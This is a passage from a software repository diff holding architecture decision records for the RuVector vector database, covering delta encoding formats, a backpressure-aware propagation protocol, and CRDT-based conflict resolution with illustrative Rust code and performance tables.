| Pattern | Dimensions | Changes | Sparse | RLE | Dense | Best |
|---------|------------|---------|--------|-----|-------|------|
| Sparse (5%) | 384 | 19 | 152B | 160B | 1536B | Sparse |
| Sparse (10%) | 384 | 38 | 304B | 312B | 1536B | Sparse |
| Cluster (50 dims) | 384 | 50 | 400B | 208B | 1536B | RLE |
| Uniform (50%) | 384 | 192 | 1536B | 1600B | 1536B | Dense |
| Full refresh | 384 | 384 | 3072B | 1544B | 1536B | Dense |
### Encoding Speed (384-dim vectors, M2 ARM64)
| Format | Encode | Decode | Apply |
|--------|--------|--------|-------|
| Sparse (5%) | 1.2us | 0.3us | 0.4us |
| Sparse (10%) | 2.1us | 0.5us | 0.8us |
| RLE (cluster) | 1.8us | 0.4us | 0.5us |
| Dense (f32) | 0.2us | 0.1us | 0.3us |
| Dense (f16) | 0.8us | 0.4us | 0.6us |
| Dense (int8) | 1.2us | 0.6us | 0.9us |
### Compression Ratios
| Format | Compression | Quality Loss |
|--------|-------------|--------------|
| Sparse (5%) | 10x | 0% |
| RLE (cluster) | 7.4x | 0% |
| Dense (f32) | 1x | 0% |
| Dense (f16) | 2x | < 0.01% |
| Dense (int8) | 4x | < 0.5% |
| Dictionary | 50-100x | 0-1% |
---
## Considered Options
### Option 1: Single Sparse Format
**Description**: Use only sparse encoding for all deltas.
**Pros**:
- Simple implementation
- No format switching overhead
**Cons**:
- Inefficient for dense updates (2x overhead)
- No contiguous region optimization
**Verdict**: Rejected - real-world patterns require multiple formats.
### Option 2: Fixed Threshold Switching
**Description**: Switch between sparse/dense at fixed 50% threshold.
**Pros**:
- Predictable behavior
- Simple decision logic
**Cons**:
- Misses RLE opportunities
- Suboptimal for edge cases
**Verdict**: Rejected - adaptive switching provides 20-40% better compression.
### Option 3: Learned Format Selection
**Description**: ML model predicts optimal format.
**Pros**:
- Potentially optimal choices
- Adapts to workload
**Cons**:
- Model training complexity
- Inference overhead
- Explainability concerns
**Verdict**: Deferred - consider for v2 after baseline established.
### Option 4: Hybrid Adaptive (Selected)
**Description**: Rule-based adaptive selection with fallback.
**Pros**:
- Near-optimal compression
- Predictable, explainable
- Low selection overhead
**Cons**:
- Rules need tuning
- May miss edge cases
**Verdict**: Adopted - best balance of effectiveness and simplicity.
---
## Technical Specification
### Wire Format
```
Delta Message Format:
+--------+--------+--------+--------+--------+--------+
| Magic | Version| Format | Flags | Length |
| 0xDE7A | 0x01 | 0-3 | 8 bits | 32 bits |
+--------+--------+--------+--------+--------+--------+
| Payload |
| (format-specific data) |
+-----------------------------------------------------+
| Checksum |
| (CRC32) |
+-----------------------------------------------------+
Format codes:
0x00: Sparse
0x01: Dense
0x02: RLE
0x03: Dictionary
Flags:
bit 0: Has previous values (for undo)
bit 1: Quantized values
bit 2: Compressed payload
bit 3: Reserved
bits 4-7: Quantization mode (if bit 1 set)
```
### Sparse Payload Format
```
Sparse Payload:
+--------+--------+--------------------------------+
| Count | Dims | Delta-Encoded Indices |
| varint | varint | (varints) |
+--------+--------+--------------------------------+
| Values |
| (f32 or quantized) |
+--------------------------------------------------+
```
### Configuration
```rust
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct EncodingConfig {
/// Threshold for considering a value changed
pub epsilon: f32,
/// Minimum run length for RLE consideration
pub min_run_length: usize,
/// Sparse/Dense threshold (0.0 to 1.0)
pub sparse_threshold: f32,
/// RLE coverage threshold
pub rle_threshold: f32,
/// Optional dictionary for pattern matching
pub dictionary: Option<DeltaDictionary>,
/// Dictionary match threshold
pub dict_threshold: f32,
/// Default quantization for dense
pub default_quantization: QuantizationMode,
}
impl Default for EncodingConfig {
fn default() -> Self {
Self {
epsilon: 1e-7,
min_run_length: 4,
sparse_threshold: 0.25,
rle_threshold: 0.6,
dictionary: None,
dict_threshold: 0.95,
default_quantization: QuantizationMode::None,
}
}
}
```
---
## Consequences
### Benefits
1. **Optimal Compression**: Automatic format selection reduces storage 2-10x
2. **Low Latency**: Sub-microsecond encoding/decoding
3. **Lossless Option**: Sparse and RLE preserve exact values
4. **Extensibility**: Dictionary allows domain-specific patterns
### Risks and Mitigations
| Risk | Probability | Impact | Mitigation |
|------|-------------|--------|------------|
| Format proliferation | Low | Medium | Strict 4-format limit |
| Selection overhead | Low | Low | Pre-computed change detection |
| Dictionary bloat | Medium | Low | LRU eviction policy |
| Quantization drift | Medium | Medium | Periodic full refresh |
---
## References
1. Abadi, D., et al. "The Design and Implementation of Modern Column-Oriented Database Systems."
2. Lemire, D., & Boytsov, L. "Decoding billions of integers per second through vectorization."
3. ADR-DB-001: Delta Behavior Core Architecture
---
## Related Decisions
- **ADR-DB-001**: Delta Behavior Core Architecture
- **ADR-DB-006**: Delta Compression Strategy

View File

@@ -0,0 +1,643 @@
# ADR-DB-003: Delta Propagation Protocol
**Status**: Proposed
**Date**: 2026-01-28
**Authors**: RuVector Architecture Team
**Deciders**: Architecture Review Board
**Parent**: ADR-DB-001 Delta Behavior Core Architecture
## Version History
| Version | Date | Author | Changes |
|---------|------|--------|---------|
| 0.1 | 2026-01-28 | Architecture Team | Initial proposal |
---
## Context and Problem Statement
### The Propagation Challenge
Delta-first architecture requires efficient distribution of deltas across the system:
1. **Storage Layer**: Persist to durable storage
2. **Index Layer**: Update search indexes
3. **Cache Layer**: Invalidate/update caches
4. **Replication Layer**: Sync to replicas
5. **Client Layer**: Notify subscribers
The propagation protocol must balance:
- **Latency**: Fast delivery to all consumers
- **Ordering**: Preserve causal relationships
- **Reliability**: No delta loss
- **Backpressure**: Handle slow consumers
### Propagation Patterns
| Pattern | Use Case | Challenge |
|---------|----------|-----------|
| Single writer | Local updates | Simple, no conflicts |
| Multi-writer | Distributed updates | Ordering, conflicts |
| High throughput | Batch updates | Backpressure, batching |
| Low latency | Real-time search | Immediate propagation |
| Geo-distributed | Multi-region | Network partitions |
---
## Decision
### Adopt Reactive Push with Backpressure
We implement a reactive push protocol with causal ordering and adaptive backpressure.
### Architecture Overview
```
┌─────────────────────────────────────────────────────────────┐
│ DELTA SOURCES │
│ Local Writer │ Remote Replica │ Import │ Transform │
└─────────────────────────────┬───────────────────────────────┘
v
┌─────────────────────────────────────────────────────────────┐
│ DELTA INGEST QUEUE │
│ (bounded, backpressure-aware, deduplication) │
└─────────────────────────────┬───────────────────────────────┘
v
┌─────────────────────────────────────────────────────────────┐
│ CAUSAL ORDERING │
│ (vector clocks, dependency resolution, buffering) │
└─────────────────────────────┬───────────────────────────────┘
v
┌─────────────────────────────────────────────────────────────┐
│ PROPAGATION ROUTER │
│ (topic-based routing, priority queues, filtering) │
└────┬────────────┬────────────┬────────────┬─────────────────┘
│ │ │ │
v v v v
┌────────┐ ┌────────┐ ┌────────┐ ┌────────────┐
│Storage │ │ Index │ │ Cache │ │Replication │
│Sinks │ │ Sinks │ │ Sinks │ │ Sinks │
└────────┘ └────────┘ └────────┘ └────────────┘
```
### Core Components
#### 1. Delta Ingest Queue
```rust
/// Bounded, backpressure-aware delta ingest queue
pub struct DeltaIngestQueue {
/// Bounded queue with configurable capacity
queue: ArrayQueue<IngestDelta>,
/// Capacity for backpressure signaling
capacity: usize,
/// High water mark for warning
high_water_mark: usize,
/// Deduplication bloom filter
dedup_filter: BloomFilter<DeltaId>,
/// Metrics
metrics: IngestMetrics,
}
pub struct IngestDelta {
pub delta: VectorDelta,
pub source: DeltaSource,
pub received_at: Instant,
pub priority: Priority,
}
#[derive(Debug, Clone, Copy)]
pub enum Priority {
Critical = 0, // User-facing writes
High = 1, // Replication
Normal = 2, // Batch imports
Low = 3, // Background tasks
}
impl DeltaIngestQueue {
/// Attempt to enqueue delta with backpressure
pub fn try_enqueue(&self, delta: IngestDelta) -> Result<(), BackpressureError> {
// Check deduplication
if self.dedup_filter.contains(&delta.delta.delta_id) {
return Err(BackpressureError::Duplicate);
}
// Check capacity
let current = self.queue.len();
if current >= self.capacity {
self.metrics.record_rejection();
return Err(BackpressureError::QueueFull {
current,
capacity: self.capacity,
});
}
// Enqueue with priority sorting
self.queue.push(delta).map_err(|_| BackpressureError::QueueFull {
current,
capacity: self.capacity,
})?;
// Track for deduplication
self.dedup_filter.insert(&delta.delta.delta_id);
// Emit high water mark warning
if current > self.high_water_mark {
self.metrics.record_high_water_mark(current);
}
Ok(())
}
/// Blocking enqueue with timeout
pub async fn enqueue_timeout(
&self,
delta: IngestDelta,
timeout: Duration,
) -> Result<(), BackpressureError> {
let deadline = Instant::now() + timeout;
loop {
match self.try_enqueue(delta.clone()) {
Ok(()) => return Ok(()),
Err(BackpressureError::QueueFull { .. }) => {
if Instant::now() >= deadline {
return Err(BackpressureError::Timeout);
}
tokio::time::sleep(Duration::from_millis(10)).await;
}
Err(e) => return Err(e),
}
}
}
}
```
#### 2. Causal Ordering
```rust
/// Causal ordering component using vector clocks
pub struct CausalOrderer {
/// Per-vector clock tracking
vector_clocks: DashMap<VectorId, VectorClock>,
/// Pending deltas waiting for dependencies
pending: DashMap<DeltaId, PendingDelta>,
/// Ready queue (topologically sorted)
ready: ArrayQueue<VectorDelta>,
/// Maximum buffer size
max_pending: usize,
}
struct PendingDelta {
delta: VectorDelta,
missing_deps: HashSet<DeltaId>,
buffered_at: Instant,
}
impl CausalOrderer {
/// Process incoming delta, enforcing causal ordering
pub fn process(&self, delta: VectorDelta) -> Vec<VectorDelta> {
let mut ready_deltas = Vec::new();
// Check if parent delta is satisfied
if let Some(parent) = &delta.parent_delta {
if !self.is_delivered(parent) {
// Buffer until parent arrives
self.buffer_pending(delta, parent);
return ready_deltas;
}
}
// Delta is ready
self.mark_delivered(&delta);
ready_deltas.push(delta.clone());
// Release any deltas waiting on this one
self.release_dependents(&delta.delta_id, &mut ready_deltas);
ready_deltas
}
fn buffer_pending(&self, delta: VectorDelta, missing: &DeltaId) {
let mut missing_deps = HashSet::new();
missing_deps.insert(missing.clone());
self.pending.insert(delta.delta_id.clone(), PendingDelta {
delta,
missing_deps,
buffered_at: Instant::now(),
});
}
fn release_dependents(&self, delta_id: &DeltaId, ready: &mut Vec<VectorDelta>) {
let dependents: Vec<_> = self.pending
.iter()
.filter(|p| p.missing_deps.contains(delta_id))
.map(|p| p.key().clone())
.collect();
for dep_id in dependents {
if let Some((_, mut pending)) = self.pending.remove(&dep_id) {
pending.missing_deps.remove(delta_id);
if pending.missing_deps.is_empty() {
self.mark_delivered(&pending.delta);
ready.push(pending.delta.clone());
self.release_dependents(&dep_id, ready);
} else {
self.pending.insert(dep_id, pending);
}
}
}
}
}
```
#### 3. Propagation Router
```rust
/// Topic-based delta router with priority queues
pub struct PropagationRouter {
/// Registered sinks by topic
sinks: DashMap<Topic, Vec<Arc<dyn DeltaSink>>>,
/// Per-sink priority queues
sink_queues: DashMap<SinkId, PriorityQueue<VectorDelta>>,
/// Sink health tracking
sink_health: DashMap<SinkId, SinkHealth>,
/// Router configuration
config: RouterConfig,
}
#[async_trait]
pub trait DeltaSink: Send + Sync {
/// Unique sink identifier
fn id(&self) -> SinkId;
/// Topics this sink subscribes to
fn topics(&self) -> Vec<Topic>;
/// Process a delta
async fn process(&self, delta: &VectorDelta) -> Result<()>;
/// Batch process multiple deltas
async fn process_batch(&self, deltas: &[VectorDelta]) -> Result<()> {
for delta in deltas {
self.process(delta).await?;
}
Ok(())
}
/// Sink capacity for backpressure
fn capacity(&self) -> usize;
/// Current queue depth
fn queue_depth(&self) -> usize;
}
#[derive(Debug, Clone)]
pub enum Topic {
AllDeltas,
VectorId(VectorId),
Namespace(String),
DeltaType(DeltaType),
Custom(String),
}
impl PropagationRouter {
/// Route delta to all matching sinks
pub async fn route(&self, delta: VectorDelta) -> Result<PropagationResult> {
let topics = self.extract_topics(&delta);
let mut results = Vec::new();
for topic in topics {
if let Some(sinks) = self.sinks.get(&topic) {
for sink in sinks.iter() {
// Check sink health
let health = self.sink_health.get(&sink.id())
.map(|h| h.clone())
.unwrap_or_default();
if health.is_unhealthy() {
results.push(SinkResult::Skipped {
sink_id: sink.id(),
reason: "Unhealthy sink".into(),
});
continue;
}
// Apply backpressure if needed
if sink.queue_depth() >= sink.capacity() {
results.push(SinkResult::Backpressure {
sink_id: sink.id(),
});
self.apply_backpressure(&sink.id()).await;
continue;
}
// Route to sink
match sink.process(&delta).await {
Ok(()) => {
results.push(SinkResult::Success { sink_id: sink.id() });
self.record_success(&sink.id());
}
Err(e) => {
results.push(SinkResult::Error {
sink_id: sink.id(),
error: e.to_string(),
});
self.record_failure(&sink.id());
}
}
}
}
}
Ok(PropagationResult { delta_id: delta.delta_id, sink_results: results })
}
}
```
### Backpressure Mechanism
```
┌──────────────────────────────────────────────────────────┐
│ BACKPRESSURE FLOW │
└──────────────────────────────────────────────────────────┘
Producer Router Slow Sink
│ │ │
│ ──── Delta 1 ────────> │ │
│ │ ──── Delta 1 ──────────────> │
│ ──── Delta 2 ────────> │ │ Processing
│ │ (Queue Delta 2) │
│ ──── Delta 3 ────────> │ │
│ │ (Queue Full!) │
│ <── Backpressure ──── │ │
│ │ │
│ (Slow down...) │ ACK │
│ │ <───────────────────────── │
│ │ ──── Delta 2 ──────────────> │
│ ──── Delta 4 ────────> │ │
│ │ (Queue has space) │
│ │ ──── Delta 3 ──────────────> │
```
### Adaptive Backpressure Algorithm
```rust
pub struct AdaptiveBackpressure {
/// Current rate limit (deltas per second)
rate_limit: AtomicF64,
/// Minimum rate limit
min_rate: f64,
/// Maximum rate limit
max_rate: f64,
/// Window for measuring throughput
window: Duration,
/// Adjustment factor
alpha: f64,
}
impl AdaptiveBackpressure {
/// Adjust rate based on sink feedback
pub fn adjust(&self, sink_stats: &SinkStats) {
let current = self.rate_limit.load(Ordering::Relaxed);
// Calculate optimal rate based on sink capacity
let utilization = sink_stats.queue_depth as f64 / sink_stats.capacity as f64;
let new_rate = if utilization > 0.9 {
// Sink overwhelmed - reduce aggressively
(current * 0.5).max(self.min_rate)
} else if utilization > 0.7 {
// Approaching capacity - reduce slowly
(current * 0.9).max(self.min_rate)
} else if utilization < 0.3 {
// Underutilized - increase slowly
(current * 1.1).min(self.max_rate)
} else {
// Optimal range - maintain
current
};
// Exponential smoothing
let adjusted = self.alpha * new_rate + (1.0 - self.alpha) * current;
self.rate_limit.store(adjusted, Ordering::Relaxed);
}
}
```
---
## Latency and Throughput Analysis
### Latency Breakdown
| Stage | p50 | p95 | p99 |
|-------|-----|-----|-----|
| Ingest queue | 5us | 15us | 50us |
| Causal ordering | 10us | 30us | 100us |
| Router dispatch | 8us | 25us | 80us |
| Storage sink | 100us | 500us | 2ms |
| Index sink | 50us | 200us | 1ms |
| Cache sink | 2us | 10us | 30us |
| **Total (fast path)** | **175us** | **780us** | **3.3ms** |
### Throughput Characteristics
| Configuration | Throughput | Notes |
|---------------|------------|-------|
| Single sink | 500K delta/s | Memory-limited |
| Storage + Index | 100K delta/s | I/O bound |
| Full pipeline | 50K delta/s | With replication |
| Geo-distributed | 10K delta/s | Network bound |
### Batching Impact
| Batch Size | Latency | Throughput | Memory |
|------------|---------|------------|--------|
| 1 | 175us | 50K/s | 1KB |
| 10 | 200us | 200K/s | 10KB |
| 100 | 500us | 500K/s | 100KB |
| 1000 | 2ms | 800K/s | 1MB |
---
## Considered Options
### Option 1: Pull-Based (Polling)
**Description**: Consumers poll for new deltas.
**Pros**:
- Consumer controls rate
- Simple producer
- No backpressure needed
**Cons**:
- High latency (polling interval)
- Wasted requests when idle
- Ordering complexity at consumer
**Verdict**: Rejected - latency unacceptable for real-time search.
### Option 2: Pure Push (Fire-and-Forget)
**Description**: Producer pushes deltas without acknowledgment.
**Pros**:
- Lowest latency
- Simplest protocol
- Maximum throughput
**Cons**:
- No delivery guarantee
- No backpressure
- Slow consumers drop deltas
**Verdict**: Rejected - reliability requirements not met.
### Option 3: Reactive Streams (Rx-style)
**Description**: Full reactive streams with backpressure.
**Pros**:
- Proper backpressure
- Composable operators
- Industry standard
**Cons**:
- Complex implementation
- Learning curve
- Overhead for simple cases
**Verdict**: Partially adopted - backpressure concepts without full Rx.
### Option 4: Reactive Push with Backpressure (Selected)
**Description**: Push-based with explicit backpressure signaling.
**Pros**:
- Low latency push
- Backpressure handling
- Causal ordering
- Reliability guarantees
**Cons**:
- More complex than pure push
- Requires sink cooperation
**Verdict**: Adopted - optimal balance for delta propagation.
---
## Technical Specification
### Wire Protocol
```
Delta Propagation Message:
+--------+--------+--------+--------+--------+--------+--------+--------+
| Magic | Version| MsgType| Flags | Sequence Number (64-bit) |
| 0xD3 | 0x01 | 0-7 | 8 bits | |
+--------+--------+--------+--------+--------+--------+--------+--------+
| Payload Length (32-bit) | Delta Payload |
| | (variable) |
+--------+--------+--------+--------+-----------------------------------|
Message Types:
0x00: Delta
0x01: Batch
0x02: Ack
0x03: Nack
0x04: Backpressure
0x05: Heartbeat
0x06: Subscribe
0x07: Unsubscribe
Flags:
bit 0: Requires acknowledgment
bit 1: Priority (0=normal, 1=high)
bit 2: Compressed
bit 3: Batched
bits 4-7: Reserved
```
### Configuration
```rust
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct PropagationConfig {
/// Ingest queue capacity
pub ingest_queue_capacity: usize,
/// High water mark percentage (0.0-1.0)
pub high_water_mark: f32,
/// Maximum pending deltas in causal orderer
pub max_pending_deltas: usize,
/// Pending delta timeout
pub pending_timeout: Duration,
/// Batch size for sink delivery
pub batch_size: usize,
/// Batch timeout (flush even if batch not full)
pub batch_timeout: Duration,
/// Backpressure adjustment interval
pub backpressure_interval: Duration,
/// Retry configuration
pub retry_config: RetryConfig,
}
impl Default for PropagationConfig {
fn default() -> Self {
Self {
ingest_queue_capacity: 100_000,
high_water_mark: 0.8,
max_pending_deltas: 10_000,
pending_timeout: Duration::from_secs(30),
batch_size: 100,
batch_timeout: Duration::from_millis(10),
backpressure_interval: Duration::from_millis(100),
retry_config: RetryConfig::default(),
}
}
}
```
---
## Consequences
### Benefits
1. **Low Latency**: Sub-millisecond propagation on fast path
2. **Reliability**: Delivery guarantees with acknowledgments
3. **Scalability**: Backpressure prevents overload
4. **Ordering**: Causal consistency preserved
5. **Flexibility**: Topic-based routing for selective propagation
### Risks and Mitigations
| Risk | Probability | Impact | Mitigation |
|------|-------------|--------|------------|
| Message loss | Low | High | WAL + acknowledgments |
| Ordering violations | Low | High | Vector clocks, buffering |
| Backpressure storms | Medium | Medium | Adaptive rate limiting |
| Sink failure cascade | Medium | High | Circuit breakers, health checks |
---
## References
1. Chandy, K.M., & Lamport, L. "Distributed Snapshots: Determining Global States of Distributed Systems."
2. Reactive Streams Specification. https://www.reactive-streams.org/
3. ADR-DB-001: Delta Behavior Core Architecture
4. Ruvector gossip.rs: SWIM membership protocol
---
## Related Decisions
- **ADR-DB-001**: Delta Behavior Core Architecture
- **ADR-DB-004**: Delta Conflict Resolution
- **ADR-DB-007**: Delta Temporal Windows

View File

@@ -0,0 +1,640 @@
# ADR-DB-004: Delta Conflict Resolution
**Status**: Proposed
**Date**: 2026-01-28
**Authors**: RuVector Architecture Team
**Deciders**: Architecture Review Board
**Parent**: ADR-DB-001 Delta Behavior Core Architecture
## Version History
| Version | Date | Author | Changes |
|---------|------|--------|---------|
| 0.1 | 2026-01-28 | Architecture Team | Initial proposal |
---
## Context and Problem Statement
### The Conflict Challenge
In distributed delta-first systems, concurrent updates to the same vector can create conflicts:
```
Time ─────────────────────────────────────────>
Replica A: v0 ──[Δa: dim[5]=0.8]──> v1a
\
\
Replica B: ──[Δb: dim[5]=0.3]──> v1b
Conflict: Both replicas modified dim[5] concurrently
```
### Conflict Scenarios
| Scenario | Frequency | Complexity |
|----------|-----------|------------|
| Same dimension, different values | High | Simple |
| Overlapping sparse updates | Medium | Moderate |
| Scale vs. sparse conflict | Low | Complex |
| Delete vs. update race | Low | Critical |
### Requirements
1. **Deterministic**: Same conflicts resolve identically on all replicas
2. **Commutative**: Order of conflict discovery doesn't affect outcome
3. **Low Latency**: Resolution shouldn't block writes
4. **Meaningful**: Results should be mathematically sensible for vectors
---
## Decision
### Adopt CRDT-Based Resolution with Causal Ordering
We implement conflict resolution using Conflict-free Replicated Data Types (CRDTs) with vector-specific merge semantics.
### CRDT Design for Vectors
#### Vector as a CRDT
```rust
/// CRDT-enabled vector with per-dimension version tracking
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct CrdtVector {
/// Vector ID
pub id: VectorId,
/// Dimensions with per-dimension causality
pub dimensions: Vec<CrdtDimension>,
/// Overall vector clock
pub clock: VectorClock,
/// Deletion marker
pub tombstone: Option<Tombstone>,
}
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct CrdtDimension {
/// Current value
pub value: f32,
/// Last update clock
pub clock: VectorClock,
/// Originating replica
pub origin: ReplicaId,
/// Timestamp of update
pub timestamp: DateTime<Utc>,
}
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct Tombstone {
pub deleted_at: DateTime<Utc>,
pub deleted_by: ReplicaId,
pub clock: VectorClock,
}
```
#### Merge Operation
```rust
impl CrdtVector {
/// Merge another CRDT vector into this one
pub fn merge(&mut self, other: &CrdtVector) -> MergeResult {
assert_eq!(self.id, other.id);
let mut conflicts = Vec::new();
// Handle tombstone
self.tombstone = match (&self.tombstone, &other.tombstone) {
(None, None) => None,
(Some(t), None) | (None, Some(t)) => Some(t.clone()),
(Some(t1), Some(t2)) => {
// Latest tombstone wins
Some(if t1.timestamp > t2.timestamp { t1.clone() } else { t2.clone() })
}
};
// If deleted, no need to merge dimensions
if self.tombstone.is_some() {
return MergeResult { conflicts, tombstoned: true };
}
// Merge each dimension
for (i, (self_dim, other_dim)) in
self.dimensions.iter_mut().zip(other.dimensions.iter()).enumerate()
{
let ordering = self_dim.clock.compare(&other_dim.clock);
match ordering {
ClockOrdering::Before => {
// Other is newer, take it
*self_dim = other_dim.clone();
}
ClockOrdering::After | ClockOrdering::Equal => {
// Self is newer or equal, keep it
}
ClockOrdering::Concurrent => {
// Conflict! Apply resolution strategy
let resolved = self.resolve_dimension_conflict(i, self_dim, other_dim);
conflicts.push(DimensionConflict {
dimension: i,
local_value: self_dim.value,
remote_value: other_dim.value,
resolved_value: resolved.value,
strategy: resolved.strategy,
});
*self_dim = resolved.dimension;
}
}
}
// Update overall clock
self.clock.merge(&other.clock);
MergeResult { conflicts, tombstoned: false }
}
fn resolve_dimension_conflict(
&self,
dim_idx: usize,
local: &CrdtDimension,
remote: &CrdtDimension,
) -> ResolvedDimension {
// Strategy selection based on configured policy
match self.conflict_strategy(dim_idx) {
ConflictStrategy::LastWriteWins => {
// Latest timestamp wins
let winner = if local.timestamp > remote.timestamp { local } else { remote };
ResolvedDimension {
dimension: winner.clone(),
strategy: ConflictStrategy::LastWriteWins,
}
}
ConflictStrategy::MaxValue => {
// Take maximum value
let max_val = local.value.max(remote.value);
let winner = if local.value >= remote.value { local } else { remote };
ResolvedDimension {
dimension: CrdtDimension {
value: max_val,
clock: merge_clocks(&local.clock, &remote.clock),
origin: winner.origin.clone(),
timestamp: winner.timestamp.max(remote.timestamp),
},
strategy: ConflictStrategy::MaxValue,
}
}
ConflictStrategy::Average => {
// Average the values
let avg = (local.value + remote.value) / 2.0;
ResolvedDimension {
dimension: CrdtDimension {
value: avg,
clock: merge_clocks(&local.clock, &remote.clock),
origin: "merged".into(),
timestamp: local.timestamp.max(remote.timestamp),
},
strategy: ConflictStrategy::Average,
}
}
ConflictStrategy::ReplicaPriority(priorities) => {
// Higher priority replica wins
let local_priority = priorities.get(&local.origin).copied().unwrap_or(0);
let remote_priority = priorities.get(&remote.origin).copied().unwrap_or(0);
let winner = if local_priority >= remote_priority { local } else { remote };
ResolvedDimension {
dimension: winner.clone(),
strategy: ConflictStrategy::ReplicaPriority(priorities),
}
}
}
}
}
```
### Conflict Resolution Strategies
```rust
#[derive(Debug, Clone, Serialize, Deserialize)]
pub enum ConflictStrategy {
/// Last write wins based on timestamp
LastWriteWins,
/// Take maximum value (for monotonic dimensions)
MaxValue,
/// Take minimum value
MinValue,
/// Average conflicting values
Average,
/// Weighted average based on replica trust
WeightedAverage(HashMap<ReplicaId, f32>),
/// Replica priority ordering
ReplicaPriority(HashMap<ReplicaId, u32>),
/// Custom merge function
Custom(CustomMergeFn),
}
pub type CustomMergeFn = Arc<dyn Fn(f32, f32, &ConflictContext) -> f32 + Send + Sync>;
```
### Vector Clock Implementation
```rust
/// Extended vector clock for delta tracking
#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
pub struct VectorClock {
/// Replica -> logical timestamp mapping
clock: HashMap<ReplicaId, u64>,
}
impl VectorClock {
pub fn new() -> Self {
Self { clock: HashMap::new() }
}
/// Increment for local replica
pub fn increment(&mut self, replica: &ReplicaId) {
let counter = self.clock.entry(replica.clone()).or_insert(0);
*counter += 1;
}
/// Get timestamp for replica
pub fn get(&self, replica: &ReplicaId) -> u64 {
self.clock.get(replica).copied().unwrap_or(0)
}
/// Merge with another clock (take max)
pub fn merge(&mut self, other: &VectorClock) {
for (replica, &ts) in &other.clock {
let current = self.clock.entry(replica.clone()).or_insert(0);
*current = (*current).max(ts);
}
}
/// Compare two clocks for causality
pub fn compare(&self, other: &VectorClock) -> ClockOrdering {
let mut less_than = false;
let mut greater_than = false;
// Check all replicas in self
for (replica, &self_ts) in &self.clock {
let other_ts = other.get(replica);
if self_ts < other_ts {
less_than = true;
} else if self_ts > other_ts {
greater_than = true;
}
}
// Check replicas only in other
for (replica, &other_ts) in &other.clock {
if !self.clock.contains_key(replica) && other_ts > 0 {
less_than = true;
}
}
match (less_than, greater_than) {
(false, false) => ClockOrdering::Equal,
(true, false) => ClockOrdering::Before,
(false, true) => ClockOrdering::After,
(true, true) => ClockOrdering::Concurrent,
}
}
/// Check if concurrent (conflicting)
pub fn is_concurrent(&self, other: &VectorClock) -> bool {
matches!(self.compare(other), ClockOrdering::Concurrent)
}
}
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum ClockOrdering {
Equal,
Before,
After,
Concurrent,
}
```
### Operation-Based Delta Merging
```rust
/// Merge concurrent delta operations
pub fn merge_delta_operations(
local: &DeltaOperation,
remote: &DeltaOperation,
strategy: &ConflictStrategy,
) -> DeltaOperation {
match (local, remote) {
// Both sparse: merge index sets
(
DeltaOperation::Sparse { indices: li, values: lv },
DeltaOperation::Sparse { indices: ri, values: rv },
) => {
let mut merged_indices = Vec::new();
let mut merged_values = Vec::new();
let local_map: HashMap<_, _> = li.iter().zip(lv.iter()).collect();
let remote_map: HashMap<_, _> = ri.iter().zip(rv.iter()).collect();
let all_indices: HashSet<_> = li.iter().chain(ri.iter()).collect();
for &idx in all_indices {
let local_val = local_map.get(&idx).copied();
let remote_val = remote_map.get(&idx).copied();
let value = match (local_val, remote_val) {
(Some(&l), None) => l,
(None, Some(&r)) => r,
(Some(&l), Some(&r)) => resolve_value_conflict(l, r, strategy),
(None, None) => unreachable!(),
};
merged_indices.push(*idx);
merged_values.push(value);
}
DeltaOperation::Sparse {
indices: merged_indices,
values: merged_values,
}
}
// Sparse vs Dense: apply sparse changes on top of dense
(
DeltaOperation::Sparse { indices, values },
DeltaOperation::Dense { vector },
)
| (
DeltaOperation::Dense { vector },
DeltaOperation::Sparse { indices, values },
) => {
let mut result = vector.clone();
for (&idx, &val) in indices.iter().zip(values.iter()) {
result[idx as usize] = val;
}
DeltaOperation::Dense { vector: result }
}
// Both dense: element-wise merge
(
DeltaOperation::Dense { vector: lv },
DeltaOperation::Dense { vector: rv },
) => {
let merged: Vec<f32> = lv.iter()
.zip(rv.iter())
.map(|(&l, &r)| resolve_value_conflict(l, r, strategy))
.collect();
DeltaOperation::Dense { vector: merged }
}
// Scale operations: compose
(
DeltaOperation::Scale { factor: f1 },
DeltaOperation::Scale { factor: f2 },
) => {
DeltaOperation::Scale { factor: f1 * f2 }
}
// Delete wins over updates (tombstone semantics)
(DeltaOperation::Delete, _) | (_, DeltaOperation::Delete) => {
DeltaOperation::Delete
}
// Other combinations: convert to dense and merge
_ => {
// Fallback: materialize both and merge
DeltaOperation::Dense {
vector: vec![], // Would compute actual merge
}
}
}
}
fn resolve_value_conflict(local: f32, remote: f32, strategy: &ConflictStrategy) -> f32 {
match strategy {
ConflictStrategy::LastWriteWins => remote, // Assume remote is "latest"
ConflictStrategy::MaxValue => local.max(remote),
ConflictStrategy::MinValue => local.min(remote),
ConflictStrategy::Average => (local + remote) / 2.0,
ConflictStrategy::WeightedAverage(weights) => {
// Would need context for proper weighting
(local + remote) / 2.0
}
_ => remote, // Default fallback
}
}
```
---
## Consistency Guarantees
### Eventual Consistency
The CRDT approach guarantees **strong eventual consistency**:
1. **Eventual Delivery**: All deltas eventually reach all replicas
2. **Convergence**: Replicas with same deltas converge to same state
3. **Termination**: Merge operations always terminate
### Causal Consistency
Vector clocks ensure causal ordering:
```
Property: If Δa happens-before Δb, then on all replicas:
Δa is applied before Δb
Proof: Vector clock comparison ensures causal dependencies
are satisfied before applying deltas
```
### Conflict Freedom Theorem
```
For any two concurrent deltas Δa and Δb:
merge(Δa, Δb) = merge(Δb, Δa) [Commutativity]
merge(Δa, merge(Δb, Δc)) = merge(merge(Δa, Δb), Δc) [Associativity]
merge(Δa, Δa) = Δa [Idempotence]
```
These properties ensure:
- Order-independent convergence
- Safe retry/redelivery
- Partition tolerance
---
## Considered Options
### Option 1: Last-Write-Wins (LWW)
**Description**: Latest timestamp wins, simple conflict resolution.
**Pros**:
- Extremely simple
- Low overhead
- Deterministic
**Cons**:
- Clock skew sensitivity
- Loses concurrent updates
- No semantic awareness
**Verdict**: Available as strategy option, not default.
### Option 2: Pure Vector Clocks
**Description**: Track causality, reject concurrent writes.
**Pros**:
- Perfect causality tracking
- No data loss
**Cons**:
- Requires conflict handling at application level
- Concurrent writes fail
**Verdict**: Rejected - too restrictive for vector workloads.
